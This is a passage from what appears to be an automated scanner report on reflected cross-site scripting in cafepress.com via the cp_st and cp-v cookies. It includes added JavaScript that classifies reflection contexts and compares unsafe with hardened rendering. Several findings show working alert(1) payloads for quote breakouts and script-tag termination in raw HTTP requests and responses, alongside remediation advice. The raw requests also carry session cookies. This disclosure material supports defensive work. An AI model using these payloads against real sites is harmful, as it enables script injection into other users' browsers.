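    // cp-v: the quote breakout runs alert(1) and leaves eVar30 as NaN.
    unsafeAlertFired: unsafeEVar.alerts.length === 1,
    unsafeValueIsNaN: Number.isNaN(unsafeEVar.s.eVar30),
    // Hardened: no alert, and the full cookie value survives intact.
    safeAlertFired: safeEVar.alerts.length > 0,
    safeValueIntact: safeEVar.s.eVar30 === EVAR30_PREFIX + CPV_VALUE,
    // cp_st: the unsafe render contains a script terminator, the hardened one
    // does not, and the hardened one still round-trips the search term.
    unsafeTerminatesScript: containsScriptTerminator(renderSearchTermUnsafe(CPST_VALUE)),
    safeTerminatesScript: containsScriptTerminator(renderSearchTermSafe(CPST_VALUE)),
    safeTermIntact: safeTerm.window.cafepress.tealeaf.searchTerm === CPST_VALUE,
  };
}

console.log(compare());
```

The cp-v case is instructive because the breakout keeps the statement syntactically valid: the string is closed, alert(1) runs as an operand of a subtraction, and a second string is opened, so the analytics script continues without an error. The cp_st case shows why the fix has to encode angle brackets as well as quotes: the payload never leaves the single-quoted literal at the JavaScript level, yet the HTML tokenizer still ends the script element at </script.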
1.23. http://www.cafepress.com/+buttons [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+buttons
Issue detail
The value of the cp_st cookie is copied, unencoded, into a JavaScript string literal delimited by single quotation marks inside an inline script (the window.cafepress.tealeaf.searchTerm assignment in the response below). The payload 49536</script><script>alert(1)</script>00786d92ac was submitted in the cp_st cookie and echoed unmodified. Note that this payload never touches the quotes: the HTML parser ends the script element at the first </script regardless of the JavaScript quoting state, and the injected <script> block that follows is then executed. Escaping quotes alone would therefore not close this reflection; <, > and & must be encoded as well. This proof of concept shows that arbitrary JavaScript can be injected into the application's response. Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie in the victim's browser, for example through a response-header injection, through content on any host able to set cookies for the cafepress.com domain (the application's own Set-Cookie headers use domain=cafepress.com, so every subdomain is in scope), or through an on-path attacker, since the page is served over plain HTTP. That prerequisite considerably reduces the impact of the issue.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and makes XSS hard to prevent reliably. Where possible, keep user data out of inline script altogether: emit it in an HTML attribute (for example a data-* attribute) with standard HTML entity encoding and have the page's JavaScript read it at runtime. If the value must appear inside a script, serialise it as a JSON string and additionally escape <, >, & and the line terminators U+2028 and U+2029 as \uXXXX sequences, so that neither a quote nor a </script> sequence in the input can change the surrounding syntax. Escaping quotes on its own is not sufficient, as this finding shows.
Request
GET /+buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=49536</script><script>alert(1)</script>00786d92ac ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 59667 Date: Sun, 26 Dec 2010 13:48:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:52 GMT; path=/ Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:52 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59667 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '49536</script><script>alert(1)</script>00786d92ac ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.24. http://www.cafepress.com/+calendars [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+calendars
Issue detail
The value of the cp-v cookie is copied, unencoded, into a JavaScript string literal delimited by double quotation marks inside an inline script (the s.eVar30 assignment in the response below). The payload f773c"-alert(1)-"fa99a9758e1 was submitted in the cp-v cookie and echoed unmodified. The embedded double quote closes the literal, -alert(1)- is then evaluated as part of a subtraction expression, and the final quote reopens a string so the statement remains syntactically valid and the script does not abort. This proof of concept shows that arbitrary JavaScript can be injected into the application's response. Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie in the victim's browser, for example through a response-header injection, through content on any host able to set cookies for the cafepress.com domain (the application's own Set-Cookie headers use domain=cafepress.com, so every subdomain is in scope), or through an on-path attacker, since the page is served over plain HTTP. That prerequisite considerably reduces the impact of the issue.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and makes XSS hard to prevent reliably. Where possible, keep user data out of inline script altogether: emit it in an HTML attribute (for example a data-* attribute) with standard HTML entity encoding and have the page's JavaScript read it at runtime. If the value must appear inside a script, serialise it as a JSON string and additionally escape <, >, & and the line terminators U+2028 and U+2029 as \uXXXX sequences, so that neither a quote nor a </script> sequence in the input can change the surrounding syntax. Escaping quotes on its own is not sufficient, as the cp_st findings in this report show.
Request
GET /+calendars HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAf773c"-alert(1)-"fa99a9758e1 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 57747 Date: Sun, 26 Dec 2010 13:49:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57747 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf773c"-alert(1)-"fa99a9758e1 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
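The wording "copied into a JavaScript string which is encapsulated in single/double quotation marks" is the output of a context classifier: locate the injected marker in the response, decide whether it sits inside an inline script element, and if so determine the quoting state at that point. The following is an added example of such a classifier written for this page; it is not code from the report or from the scanner that generated it. The MARKER value, the SAMPLES fragments (constructed to mirror the two contexts seen in these findings) and the function names are assumptions made for the example.

```javascript
// Added example, not part of the report or of the scanner that generated it.
// Given a response body and the unique marker that was injected, decide
// whether the marker landed inside an inline <script> and, if so, which kind
// of string literal surrounds it. Plain Node.js (12+), no dependencies.

const MARKER = "e64e3x4f4360aac81"; // constructed probe with no special characters

// Constructed response fragments mirroring the contexts in this report.
const SAMPLES = {
  // cp-v context: double-quoted literal in the analytics script
  doubleQuoted: '<script>s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:' + MARKER + '"; s.eVar26 = "";</script>',
  // cp_st context: single-quoted literal in the tealeaf script
  singleQuoted: "<script>window.cafepress.tealeaf.searchTerm = '" + MARKER + "'</script>",
  // marker echoed in plain markup, not inside a script at all
  htmlBody: '<div class="crumb">' + MARKER + "</div>",
  // marker after a script element has already been closed
  afterScript: "<script>var a = 1;</script><p>" + MARKER + "</p>",
  // marker inside a script but outside any string literal
  bareInScript: "<script>var x = " + MARKER + ";</script>",
};

// Index of the last match of a global regex in `hay`, or -1.
function lastMatchIndex(hay, re) {
  let last = -1;
  for (const m of hay.matchAll(re)) last = m.index;
  return last;
}

// Scan JavaScript source from the start of the script element up to the marker
// and report the quoting state at that point: "'" or '"' when inside a string
// literal, otherwise null. Handles backslash escapes and // and /* */ comments;
// template and regex literals are out of scope for this example.
function quoteStateAt(js) {
  let state = null; // null | "'" | '"' | "//" | "/*"
  for (let i = 0; i < js.length; i++) {
    const c = js[i], n = js[i + 1];
    if (state === "'" || state === '"') {
      if (c === "\\") { i++; continue; } // skip the escaped character
      if (c === state) state = null;
    } else if (state === "//") {
      if (c === "\n") state = null;
    } else if (state === "/*") {
      if (c === "*" && n === "/") { state = null; i++; }
    } else if (c === "'" || c === '"') {
      state = c;
    } else if (c === "/" && n === "/") {
      state = "//"; i++;
    } else if (c === "/" && n === "*") {
      state = "/*"; i++;
    }
  }
  return state === "'" || state === '"' ? state : null;
}

// Classify the first reflection of `marker` in `body`.
function classifyReflection(body, marker) {
  const at = body.indexOf(marker);
  if (at < 0) return { reflected: false, context: null, quote: null };
  const before = body.slice(0, at);
  const open = lastMatchIndex(before, /<script\b/gi);
  const close = lastMatchIndex(before, /<\/script/gi);
  // No <script> before the marker, or the last one was already closed.
  if (open < 0 || close > open) return { reflected: true, context: "html", quote: null };
  const codeStart = before.indexOf(">", open) + 1; // end of the <script ...> tag
  return { reflected: true, context: "script", quote: quoteStateAt(before.slice(codeStart)) };
}

for (const [name, body] of Object.entries(SAMPLES)) {
  console.log(name, classifyReflection(body, MARKER));
}
```

In practice a scanner submits a harmless random marker first, classifies the context as above, and only then chooses a payload shaped for it: a quote-breakout such as "-alert(1)-" for a double-quoted literal, or a </script>-based payload when the goal is to leave the script element regardless of quoting. The bareInScript sample is the most dangerous context of all, since no encoding of quotes or angle brackets helps when the value is already being parsed as code.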
1.25. http://www.cafepress.com/+calendars [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+calendars
Issue detail
The value of the cp_st cookie is copied, unencoded, into a JavaScript string literal delimited by single quotation marks inside an inline script (the window.cafepress.tealeaf.searchTerm assignment in the response below). The payload 673c2</script><script>alert(1)</script>81eee94446c was submitted in the cp_st cookie and echoed unmodified. Note that this payload never touches the quotes: the HTML parser ends the script element at the first </script regardless of the JavaScript quoting state, and the injected <script> block that follows is then executed. Escaping quotes alone would therefore not close this reflection; <, > and & must be encoded as well. This proof of concept shows that arbitrary JavaScript can be injected into the application's response. Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie in the victim's browser, for example through a response-header injection, through content on any host able to set cookies for the cafepress.com domain (the application's own Set-Cookie headers use domain=cafepress.com, so every subdomain is in scope), or through an on-path attacker, since the page is served over plain HTTP. That prerequisite considerably reduces the impact of the issue.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and makes XSS hard to prevent reliably. Where possible, keep user data out of inline script altogether: emit it in an HTML attribute (for example a data-* attribute) with standard HTML entity encoding and have the page's JavaScript read it at runtime. If the value must appear inside a script, serialise it as a JSON string and additionally escape <, >, & and the line terminators U+2028 and U+2029 as \uXXXX sequences, so that neither a quote nor a </script> sequence in the input can change the surrounding syntax. Escaping quotes on its own is not sufficient, as this finding shows.
Request
GET /+calendars HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=673c2</script><script>alert(1)</script>81eee94446c ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 57764 Date: Sun, 26 Dec 2010 13:49:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:13 GMT; path=/ Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:13 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57764 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '673c2</script><script>alert(1)</script>81eee94446c ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.26. http://www.cafepress.com/+clocks [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+clocks
Issue detail
The value of the cp-v cookie is copied, unencoded, into a JavaScript string literal delimited by double quotation marks inside an inline script (the s.eVar30 assignment in the response below). The payload 405f7"-alert(1)-"c5d27bb0659 was submitted in the cp-v cookie and echoed unmodified. The embedded double quote closes the literal, -alert(1)- is then evaluated as part of a subtraction expression, and the final quote reopens a string so the statement remains syntactically valid and the script does not abort. This proof of concept shows that arbitrary JavaScript can be injected into the application's response. Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie in the victim's browser, for example through a response-header injection, through content on any host able to set cookies for the cafepress.com domain (the application's own Set-Cookie headers use domain=cafepress.com, so every subdomain is in scope), or through an on-path attacker, since the page is served over plain HTTP. That prerequisite considerably reduces the impact of the issue.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and makes XSS hard to prevent reliably. Where possible, keep user data out of inline script altogether: emit it in an HTML attribute (for example a data-* attribute) with standard HTML entity encoding and have the page's JavaScript read it at runtime. If the value must appear inside a script, serialise it as a JSON string and additionally escape <, >, & and the line terminators U+2028 and U+2029 as \uXXXX sequences, so that neither a quote nor a </script> sequence in the input can change the surrounding syntax. Escaping quotes on its own is not sufficient, as the cp_st findings in this report show.
Request
GET /+clocks HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA405f7"-alert(1)-"c5d27bb0659 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59340 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA405f7"-alert(1)-"c5d27bb0659 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.27. http://www.cafepress.com/+clocks [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+clocks
Issue detail
The value of the cp_st cookie is copied, unencoded, into a JavaScript string literal delimited by single quotation marks inside an inline script (the window.cafepress.tealeaf.searchTerm assignment in the response below). The payload 56c87</script><script>alert(1)</script>eb1ed059733 was submitted in the cp_st cookie and echoed unmodified. Note that this payload never touches the quotes: the HTML parser ends the script element at the first </script regardless of the JavaScript quoting state, and the injected <script> block that follows is then executed. Escaping quotes alone would therefore not close this reflection; <, > and & must be encoded as well. This proof of concept shows that arbitrary JavaScript can be injected into the application's response. Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie in the victim's browser, for example through a response-header injection, through content on any host able to set cookies for the cafepress.com domain (the application's own Set-Cookie headers use domain=cafepress.com, so every subdomain is in scope), or through an on-path attacker, since the page is served over plain HTTP. That prerequisite considerably reduces the impact of the issue.
Remediation detail
